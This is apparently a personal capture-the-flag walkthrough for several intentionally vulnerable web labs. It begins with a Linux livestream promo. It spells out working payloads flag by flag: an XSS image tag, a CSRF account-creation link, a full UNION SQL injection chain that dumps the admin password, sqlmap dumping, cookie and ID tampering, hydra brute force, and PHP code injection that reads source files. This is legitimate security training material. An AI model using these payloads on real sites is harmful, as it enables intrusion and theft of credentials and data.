I am going to do a live stream covering the install and why I’ve chosen Slackware Linux over many user friendly distro’s out there.

Follow me on twitch / dlive for when I do go live.

Flag 0

• burp suite intercept, change the %3A+7.95%2C to %3A+0%2C and let it load
• Flag 0 found, this is easy!

Flag 1

• Locating the admin interface login, off the top of my head, I used admin, Admin, ps-admin, login and bingo found /Login
• Used repeater  and dumped the user name github is a good place to get a common usernames list.
• get a list for the passwords to, this will take a while let. I used.. hydra for this task built a script to dump the username, password, This one took about an hour.
• found user/password combo and logged in
• Flag 1 found brute force was the key here.

Flag 2

• This one relayed upon XSS exploit, so you need to dump  it as the user go edit a product and add the following. <img src=x onerror=alert(1)> in the name and description and hit save.
• Add the product to to the shopping cart and check out.
• Flag 2 found during check out.

Flag 0

• Review the demo, and take notes how this is all setup.
• View the live now.
• demo and live look exactly the same in the code wise.
• Admin Login -> attempt admin / admin but shouldn’t work.
• Jump to submit a ticket  and add in this information to inject some code and see if it works
• <a href=”http://localhost/newUser?username=test&password=test&password2=test”>TEST</a>
• Now login with the new account
• Read the Flag wont work.
• Flag 0 found

Flag 1

• use burp suite to find the request, we will focus on ticket?id=1 and dumping the admin login creds.
• ticket?id=1′ -> shows that it is running mysql database but we got an error message, lets run down a quick list.
• Lets try this one, ticket?id=1 AND 1=1 *this one works* no flag tho, but ticket?id=1 AND 1=2 does not.
• Lets see if we can find the table numbers.  ticket?id=1 AND 1=1 ORDER BY 10, does not work but ticket?id=1 AND 1=1 ORDER BY 3 does. ticket?id=1 AND 1=1 ORDER BY 4 error out. Sooo lets union select.
• ticket?id=1.1 UNION SELECT 1,2,3– shows the 1,2, our rreply, 3
• Lets do some fun, lets see if we can drop a version of the database
• ticket?id=1.1 UNION SELECT VERSION(),DATABASE(),3–
• now lets get a table name
• ticket?id=1.1 UNION SELECT 1,GROUP_CONCAT(TABLE_NAME),3 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=DATABASE()–
• This should show 2 tables, one we want “users”
• Lets drop the column_name
• ticket?id=1.1 UNION SELECT 1,GROUP_CONCAT(COLUMN_NAME),3 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA=DATABASE() AND TABLE_NAME=’users’–
• This will drop the id, username, password.  Oh we are close to admin now!
• ticket?id=1.1 UNION SELECT 1,password,3 FROM users WHERE username=’admin’–
• Flag 1 found
• I just learned something, we could of just have done this. the easier way.
• Burp suite > read the GET post, save that to a file and use sqlmap -r therequest.txt –dump

Flag 0

• Hint -> don’t use common user / password combo’s
• sign’d in as user / password as both the user and password
• Flag 0 found

Flag 1

• as use view the post
• index.php?page=view.php&id=1
• copy that and change the id to 2
• flag 1 found

Flag 2

• Create a new post use burp suite from here
• and use intercept it before creating a post, check and modify the user_id value=”2″ to value =”1″  release the intercept and the webform posts as admin.
• Flag 2 found

Flag 3

• The hint gives a number to multiply with 189 * 5 that = 945
• lets review 945
• index.php?page=view.php&id=945
• Flag 3 found

Flag 4

• Use burp’s intercept again,
• edit the post and hit save besure to have  intercept on so you can change id=3 to id=1 hit
• flag 4 found

Flag 5

• burp intercept this time we are modifying cookies, you would need to md5 to find out value 1 is. You will need to logout and relogin as user and intercept that login so you can also snag that cookie.
• Take the current cookie from burp and it should be cookie id and resolve to number 2 as the md5 value.
• when you get the md5 value for 1, paste it in the interception area for burp and release to change the cookie id value.
• Flag 5 was found as you have went from user to admin.

Flag 6

• Now lets intercept when you attempt to delete a post
• again it uses md5 values when deleting posts, so change the value to 1’s md5 value.
• Flag 6 found, When you release it should drop another flag when you visit the post



Flag 0

• Toooo much information was given on the first step. If you red it right, you have 2 red flags already 1, it’s php and second include() nothing wrong with PHP per-se, just when you are first time into it, you make alot of security mistakes.
• XSS wont pass in here, tried but this wont work here.
• but if you didn’t close a few commands in the backend, try to pass some php code as an html format and see what you get?
• ie: in the comments type <?php phpinfo()?>
• Flag 0 found  geez that was too easy.

Flag 1

• All cms / blog systems have an admin interface, I mean it’s a way to control a blog content management system.
• I used burp suite for this to investigate what goes where and what gets executed and I found ?page=admin.atuh.inc
• Found user/password
• Lets do something extremely silly as this is “Cody’s first blog” after all lets see if he made a mistake, remove auth and use ?page=admin.inc
• Flag 1 found

Flag 2

• using burp suite to see more of what gets passed thru.
• Idea for this one is to use php blind injection to read the index.php source.
• pop in this command, this took me a bit to find as it’s been a while since I’ve used php.
• <?php echo readfile(“index.php”)?> in the comments like in flag0
• check the source (or use burp to see the source)
• Flag 2 found in the index.php source.